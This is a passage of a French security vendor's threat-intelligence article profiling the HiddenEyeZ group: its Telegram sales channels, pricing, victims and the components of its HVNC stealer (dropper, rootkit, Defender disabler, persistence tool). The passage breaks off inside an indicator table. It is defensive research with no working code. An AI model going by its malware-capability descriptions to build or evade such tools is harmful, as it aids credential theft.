{"id":414036,"date":"2023-05-25T15:00:23","date_gmt":"2023-05-25T14:00:23","guid":{"rendered":"https:\/\/www.stormshield.com\/?p=414036"},"modified":"2024-01-30T15:43:04","modified_gmt":"2024-01-30T14:43:04","slug":"groupe-cybercriminel-hiddeneyez-carte-identite-malwares","status":"publish","type":"post","link":"https:\/\/www.stormshield.com\/fr\/actus\/groupe-cybercriminel-hiddeneyez-carte-identite-malwares\/","title":{"rendered":"Groupe cybercriminel HiddenEyeZ : carte d\u2019identit\u00e9"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<strong>Au cours de la r\u00e9cente analyse d'une campagne de distribution de stealers RedLine<\/strong><strong>, l'\u00e9quipe de Cyber Threat Intelligence de Stormshield (<em>Stormshield Customer Security Lab<\/em>, SCSL) <\/strong><strong>a mis la main sur des samples de malwares provenant d'un groupe cyber-criminel, nomm\u00e9 HiddenEyeZ. Historique, activit\u00e9, mod\u00e8le \u00e9conomique et analyse technique des fichiers malveillants de leur malware\u00a0: d\u00e9couvrez la carte d\u2019identit\u00e9 du groupe cyber-criminel HiddenEyeZ.<\/strong><\/p>\n<p>Nos chercheurs en cybers\u00e9curit\u00e9 ont creus\u00e9 pour en savoir plus sur ce groupe, autour de leur activit\u00e9, de leur mod\u00e8le \u00e9conomique et de leurs victimes. Focus sur un jeune groupe de cyber-criminels, HiddenEyeZ.[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<\/p>\n<h2>De RedLine \u00e0 HiddenEyeZ<\/h2>\n<p>Notre analyse d\u2019<a href=\"https:\/\/www.stormshield.com\/fr\/actus\/malware-redline-extension-chrome-campagne-malveillante-envergure\/\">une campagne RedLine<\/a> a permis de d\u00e9couvrir des d\u00e9p\u00f4ts contenant des samples de malwares. Parmi ces samples, certains ne pouvaient pas \u00eatre reli\u00e9s aux attaques men\u00e9es dans cette campagne RedLine. Et en les \u00e9tudiant de plus pr\u00e8s, nous avons d\u00e9couvert que les op\u00e9rateurs cette campagne utilisaient des malwares vendus par un groupe cyber-criminel\u00a0: HiddenEyeZ.<\/p>\n<p>Cette analyse se base principalement sur les diff\u00e9rents samples trouv\u00e9s dans les d\u00e9p\u00f4ts ainsi que sur un canal Telegram public, sur lequel HiddenEyeZ publie les informations de vente de ses services. En partant de ces diff\u00e9rentes informations, nous avons orient\u00e9 nos recherches afin d'en savoir plus sur le groupe cyber-criminel, sur ses services, son mod\u00e8le \u00e9conomique, son organisation et ses victimes connues.[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<\/p>\n<h2>HiddenEyeZ : focus sur un groupe de cyber-criminels<\/h2>\n<h3>Pr\u00e9sentation d\u2019HiddenEyeZ<\/h3>\n<p>Le groupe cyber-criminel HiddenEyeZ est une organisation proposant \u00e0 ses clients des offres autour du vol de donn\u00e9es sensibles, que ce soit par la vente d'un malware permettant de r\u00e9cup\u00e9rer des donn\u00e9es sur un appareil infect\u00e9 ou par la vente directe de donn\u00e9es qu'ils ont eux-m\u00eames r\u00e9cup\u00e9r\u00e9es.<\/p>\n<p>Ce groupe montre des signes d'activit\u00e9 depuis juillet 2022 et a diffus\u00e9 son offre commerciale depuis d\u00e9cembre de la m\u00eame ann\u00e9e.<\/p>\n<p>Les \u00e9l\u00e9ments que nous avons obtenus montrent que le groupe est au minimum compos\u00e9 de six personnes : un d\u00e9veloppeur et cinq personnes au support client.<\/p>\n<h3>Historique et activit\u00e9 de HiddenEyeZ<\/h3>\n<p>Gr\u00e2ce aux \u00e9l\u00e9ments collect\u00e9s, nous avons pu reconstituer l'historique d'activit\u00e9 du groupe. Ces donn\u00e9es indiquent que les pr\u00e9paratifs ont dur\u00e9 plusieurs mois, voire ann\u00e9es si l'on en croit les acteurs eux-m\u00eames.[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_single_image image=\"414037\" img_size=\"large\" alignment=\"center\" qode_css_animation=\"\"][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><em><small>Figure 1 : message d\u2019introduction post\u00e9 par HiddenEyeZ sur un de leurs canaux Telegram<\/small><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]La seconde partie de l\u2019ann\u00e9e 2022 a \u00e9t\u00e9 majoritairement d\u00e9di\u00e9e \u00e0 la mise en place de moyens. Nous avons class\u00e9 ces \u00e9v\u00e9nements en trois cat\u00e9gories\u00a0:<\/p>\n<ul>\n<li>les \u00e9tapes de pr\u00e9paration technique (orange), \u00e0 savoir les diff\u00e9rentes actions r\u00e9alis\u00e9es par le groupe cyber-criminel avant le d\u00e9but de la campagne\u00a0;<\/li>\n<li>les actions de communication (vert), \u00e0 savoir les \u00e9v\u00e9nements relatifs \u00e0 la communication vers les clients (comme la cr\u00e9ation des canaux de communication et la diffusion des offres)\u00a0;<\/li>\n<li>les mises \u00e0 jour du produit HiddenEyeZ HVNC (bleu), \u00e0 savoir les sorties de mises \u00e0 jour importantes de versions. Ces \u00e9v\u00e9nements montrent que le d\u00e9veloppement continue activement depuis la sortie de l'offre. De plus, il y a de nombreux autres ajouts de fonctionnalit\u00e9s au fil de l'eau qui ne sont pas not\u00e9s dans cette timeline.<\/li>\n<\/ul>\n<p>[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_single_image image=\"414042\" img_size=\"large\" alignment=\"center\" qode_css_animation=\"\"][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><em><small>Figure 2 : timeline de l'activit\u00e9 du groupe HiddenEyeZ depuis juillet 2022<\/small><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]\u00c0 l'heure de l'\u00e9criture de cet article, le groupe criminel est encore actif sur Telegram.<\/p>\n<p>Plusieurs indices pr\u00e9sents dans ces canaux Telegram, comme les captures d'\u00e9cran ou des messages indiquant des horaires de messages, permettent d\u2019ailleurs de d\u00e9terminer que le groupe se situe dans les environs du fuseau horaire UTC-6, r\u00e9unissant les principaux pays suivants (liste non exhaustive)\u00a0:<\/p>\n<ul>\n<li>Canada\u00a0;<\/li>\n<li>\u00c9tats-Unis\u00a0;<\/li>\n<li>Mexique.<\/li>\n<\/ul>\n<p>L'analyse de la fr\u00e9quence des messages des canaux Telegram li\u00e9s au groupe au cours de la journ\u00e9e permet de tracer un graphe d'activit\u00e9. Les messages s'\u00e9tendent sur une amplitude de 15\u00a0heures.<\/p>\n<ul>\n<li>En bleu, le nombre de messages \u00e9chang\u00e9s sur le canal Telegram de partage de tutoriels de hacking au cours de la semaine\u00a0;<\/li>\n<li>En orange, le nombre de message post\u00e9s sur le canal d'annonces du groupe\u00a0;<\/li>\n<li>En gris, la somme des deux courbes.<\/li>\n<\/ul>\n<p>[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_single_image image=\"414047\" img_size=\"large\" alignment=\"center\" qode_css_animation=\"\"][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><em><small>Figure 3 : analyse des heures d'activit\u00e9 sur les canaux Telegram du groupe HiddenEyeZ<\/small><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<\/p>\n<h3>Mod\u00e8le \u00e9conomique de HiddenEyeZ<\/h3>\n<p>Le groupe propose diff\u00e9rents produits et services, comme la licence d'utilisation de leur malware HiddenEyeZ HVNC (RAT\/stealer) ou des lots d'informations vol\u00e9es de leurs victimes par le botnet qu'ils g\u00e8rent.<\/p>\n<p>Voici la liste des offres du groupe plus en d\u00e9tails\u00a0:<\/p>\n<ul>\n<li>HiddenEyeZ HVNC : ce malware d\u00e9velopp\u00e9 par le groupe criminel est un RAT et un stealer permettant \u00e0 un attaquant de r\u00e9cup\u00e9rer des donn\u00e9es sensibles sur les postes de ses victimes (mots de passe, donn\u00e9es bancaires, cookies de connexion, portefeuilles de cryptomonnaies, etc). Une analyse plus d\u00e9taill\u00e9e de ce malware est pr\u00e9sente dans la suite de cet article\u00a0;<\/li>\n<li>HiddenCrypt : ce service permet \u00e0 un client d'obfusquer un payload avant de le d\u00e9ployer chez une victime. Ainsi, ce client va chercher \u00e0 \u00e9viter les d\u00e9tections par les produits de s\u00e9curit\u00e9 (antivirus, sondes r\u00e9seaux, etc) qui seraient en place chez sa victime\u00a0;<\/li>\n<li>Botnet Log Packs : cette offre permet \u00e0 un client d'acheter directement en ensemble de donn\u00e9es r\u00e9cup\u00e9r\u00e9es chez des victimes. Ces informations sensibles sont disponibles avec diff\u00e9rentes th\u00e9matiques sp\u00e9cifiques : donn\u00e9es bancaires, portefeuilles de cryptomonnaies ou informations de connexion \u00e0 des services de cryptomonnaies\u00a0;<\/li>\n<li>distribution de malwares : ce service permet \u00e0 un client de d\u00e9ployer un malware directement chez des victimes du botnet op\u00e9r\u00e9 par le groupe cyber-criminel\u00a0;<\/li>\n<li>tutoriel : cette offre permet \u00e0 un client d\u2019acc\u00e9der \u00e0 des documentations sur la cybercriminalit\u00e9 sur des th\u00e9matiques sp\u00e9cifiques : botnet, malware, spamming\u00a0;<\/li>\n<li>support apr\u00e8s-vente sur Telegram.<\/li>\n<\/ul>\n<p>Le prix pour une utilisation du malware HiddenEyeZ HVNC au mois est de quelques centaines de dollars et la licence \u00e0 vie est \u00e0 1 500 dollars. \u00c0 noter que le groupe a recours \u00e0 des pratiques commerciales traditionnelles, telles que des promotions temporaires.[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_single_image image=\"414052\" img_size=\"large\" alignment=\"center\" qode_css_animation=\"\"][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><em><small>Figure 4 : message post\u00e9 par HiddenEyeZ sur un canal Telegram indiquant une promotion sur les achats de licences<\/small><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]Les ventes sont r\u00e9alis\u00e9es directement via un bot Telegram ou depuis sellix.io, une plateforme de paiement pour produits d\u00e9mat\u00e9rialis\u00e9s acceptant les cryptomonnaies.<\/p>\n<h3>Relations entre les comptes Telegram de HiddenEyeZ<\/h3>\n<p>Le groupe HiddenEyeZ utilise de nombreux comptes Telegram en relation avec les services propos\u00e9s. On y retrouve ainsi\u00a0:<\/p>\n<ul>\n<li>le compte du canal sur lequel sont diffus\u00e9es les informations commerciales\u00a0;<\/li>\n<li>le compte \"personnel\" du d\u00e9veloppeur du malware HiddenEyeZ HVNC\u00a0;<\/li>\n<li>un compte g\u00e9n\u00e9rique permettant de contacter l'\u00e9quipe de support\u00a0;<\/li>\n<li>cinq comptes \"personnels\" de l'\u00e9quipe de support\u00a0;<\/li>\n<li>un bot de support permettant de consulter une FAQ\u00a0;<\/li>\n<li>un bot permettant la souscription aux services\u00a0;<\/li>\n<li>un bot permettant d'acheter et d'utiliser un service d'obfuscation de payload\u00a0;<\/li>\n<li>un bot publiant des \u00e9chantillons de donn\u00e9es de victimes\u00a0;<\/li>\n<li>le compte du d\u00e9veloppeur d\u00e9di\u00e9 au partage de tutoriels sur le hacking.<\/li>\n<\/ul>\n<p>Trois canaux ont \u00e9t\u00e9 identifi\u00e9s en rapport avec ce groupe\u00a0:<\/p>\n<ul>\n<li>le canal principal permettant de diffuser les informations commerciales sur les diff\u00e9rentes offres\u00a0;<\/li>\n<li>un canal priv\u00e9 permettant d\u2019\u00e9changer avec les acheteurs du malware HiddenEyeZ HVNC\u00a0;<\/li>\n<li>un canal d\u00e9di\u00e9 au partage de tutoriels sur le hacking.<\/li>\n<\/ul>\n<h3>Cibles et victimes de HiddenEyeZ<\/h3>\n<p>Le groupe HiddenEyeZ publie des \u00e9chantillons de logs de victimes sur son salon Telegram pour servir de d\u00e9monstration \u00e0 de potentiels clients.<\/p>\n<p>En se basant sur les donn\u00e9es d'un \u00e9chantillon de 103\u00a0victimes, nous avons pu reconstituer la carte suivante pour en savoir plus sur la localisation des diff\u00e9rentes victimes. L'\u00e9chantillon dont nous disposons n'est que tr\u00e8s partiel, puisque cette campagne compte au minimum un millier de victimes.[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_single_image image=\"414057\" img_size=\"large\" alignment=\"center\" qode_css_animation=\"\"][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><em><small>Figure 5 : carte des victimes du groupe HiddenEyeZ. Les pays en jaunes comptent entre une et cinq victimes de l'\u00e9chantillon, tandis que ceux en orange en comptent plus de cinq<\/small><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]Bien que cet \u00e9chantillon ne soit pas repr\u00e9sentatif de l'ensemble des victimes, on constate qu\u2019elles sont r\u00e9parties \u00e0 travers le monde. Curiosit\u00e9s de l\u2019\u00e9chantillon\u00a0: pas une victime constat\u00e9e en France, ni aux \u00c9tats-Unis.<\/p>\n<p>D\u2019autant plus surprenant que des messages post\u00e9s sur un canal Telegram montrent un int\u00e9r\u00eat particulier pour certains pays comme les \u00c9tats-Unis. Le premier message montre que les informations bancaires des \u00c9tats-Unis sont sp\u00e9cifiquement vis\u00e9es. Les deux suivants montrent que le groupe cyber-criminel valorise commercialement les informations r\u00e9cup\u00e9r\u00e9es chez les victimes provenant de ce pays\u00a0:[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_single_image image=\"414062\" img_size=\"large\" alignment=\"center\" qode_css_animation=\"\"][vc_empty_space height=\"2px\"][vc_single_image image=\"414067\" img_size=\"large\" alignment=\"center\" qode_css_animation=\"\"][vc_empty_space height=\"2px\"][vc_single_image image=\"414072\" img_size=\"large\" alignment=\"center\" qode_css_animation=\"\"][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><em><small>Figure 6 : trois messages publi\u00e9s par le groupe HiddenEyeZ sur un de leurs canaux Telegram montrant un int\u00e9r\u00eat pour les \u00c9tats-Unis<\/small><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<\/p>\n<h2>Analyse des fichiers malveillants du malware HiddenEyeZ HVNC<\/h2>\n<p>Apr\u00e8s avoir \u00e9tudi\u00e9 le fonctionnement du groupe HiddenEyeZ, nous allons nous int\u00e9resser au malware HiddenEyeZ HVNC, leur principal produit.<\/p>\n<p>Nous avons \u00e9tudi\u00e9 l\u2019\u00e9cosyst\u00e8me du malware HiddenEyeZ HVNC depuis l\u2019utilisation de son dropper suite \u00e0 une primo-infection. \u00c0 savoir\u00a0:<\/p>\n<ul>\n<li>Dropper de HiddenEyeZ HVNC\u00a0;<\/li>\n<li>HiddenEyeZ HVNC\u00a0: le malware lui-m\u00eame\u00a0;<\/li>\n<li>r77 : le rootkit d\u00e9ploy\u00e9 par HiddenEyeZ HVNC pour accroitre son niveau de furtivit\u00e9\u00a0;<\/li>\n<li>Icarus : le stealer d\u00e9ploy\u00e9 par HiddenEyeZ HVNC pour effectuer la r\u00e9cup\u00e9ration automatique des donn\u00e9es de la victime\u00a0;<\/li>\n<li>Highlander\u00a0: un outil d\u00e9ploy\u00e9 par HiddenEyeZ HVNC d\u00e9sactivant Windows Defender\u00a0;<\/li>\n<li>AddStartupTask : un outil d\u00e9ploy\u00e9 par HiddenEyeZ HVNC permettant de mettre en place de la persistance.<\/li>\n<\/ul>\n<p>Voici une vue r\u00e9capitulative des interactions entre les diff\u00e9rents binaires et les serveurs utilis\u00e9s\u00a0:[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_single_image image=\"414077\" img_size=\"large\" alignment=\"center\" qode_css_animation=\"\"][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><em><small>Figure 7 : repr\u00e9sentation des interactions entre les composants du malware HiddenEyeZ HVNC<\/small><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<\/p>\n<h3>Dropper de HiddenEyeZ HVNC<\/h3>\n<h4>Carte d'identit\u00e9 du malware<\/h4>\n<p>[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<div class=\"ntb_table_wrapper ninja_table_builder_instance_0\"\n     id='ninja_table_builder_414281'\n     data-ninja_table_builder_instance=\"ninja_table_builder_instance_0\"\n     style=\"\n     max-height:900px;\n     max-width: 800px;margin-right: auto;\">\n    <!----> <table id=\"ntb_table\" role=\"table\" class=\"table ninja_tables_builder_class_414281\" style=\"margin-top: 0px; margin-bottom: 0px; table-layout: fixed; border-collapse: collapse; border: 0px solid rgb(0, 0, 0); font-family: inherit; border-spacing: 0px; margin-right: auto;\"><!----> <tbody class=\"tbody\"><tr id=\"tr_id_6339902\" class=\"desktop-view tr_class_6339902 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_47180689\" rowspan=\"1\" colspan=\"1\" class=\"td_class_47180689\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_47180689\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Type of file<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_63752073\" rowspan=\"1\" colspan=\"1\" class=\"td_class_63752073\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_63752073\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">PE<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_2992313\" class=\"desktop-view tr_class_2992313 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_85508872\" rowspan=\"1\" colspan=\"1\" class=\"td_class_85508872\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_85508872\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Language used<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_67647307\" rowspan=\"1\" colspan=\"1\" class=\"td_class_67647307\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_67647307\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">.NET<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_7169041\" class=\"desktop-view tr_class_7169041 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_88081221\" rowspan=\"1\" colspan=\"1\" class=\"td_class_88081221\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_88081221\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Compilation date<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_23319849\" rowspan=\"1\" colspan=\"1\" class=\"td_class_23319849\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_23319849\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Thu May 6 23:56:32 2038 | Incoherent<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_3651020\" class=\"desktop-view tr_class_3651020 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_90964305\" rowspan=\"1\" colspan=\"1\" class=\"td_class_90964305\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_90964305\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Obfuscation<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_85405762\" rowspan=\"1\" colspan=\"1\" class=\"td_class_85405762\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_85405762\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Renaming of namespaces, classes and functions<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_6471413\" class=\"desktop-view tr_class_6471413 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_22731821\" rowspan=\"1\" colspan=\"1\" class=\"td_class_22731821\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_22731821\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">md5<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_27089268\" rowspan=\"1\" colspan=\"1\" class=\"td_class_27089268\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_27089268\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">4c9bc0e73872ba91b88fda7a45e5379a<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_2624678\" class=\"desktop-view tr_class_2624678 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_74398198\" rowspan=\"1\" colspan=\"1\" class=\"td_class_74398198\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_74398198\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">sha1<\/span> <!----> <!----><\/div> <div 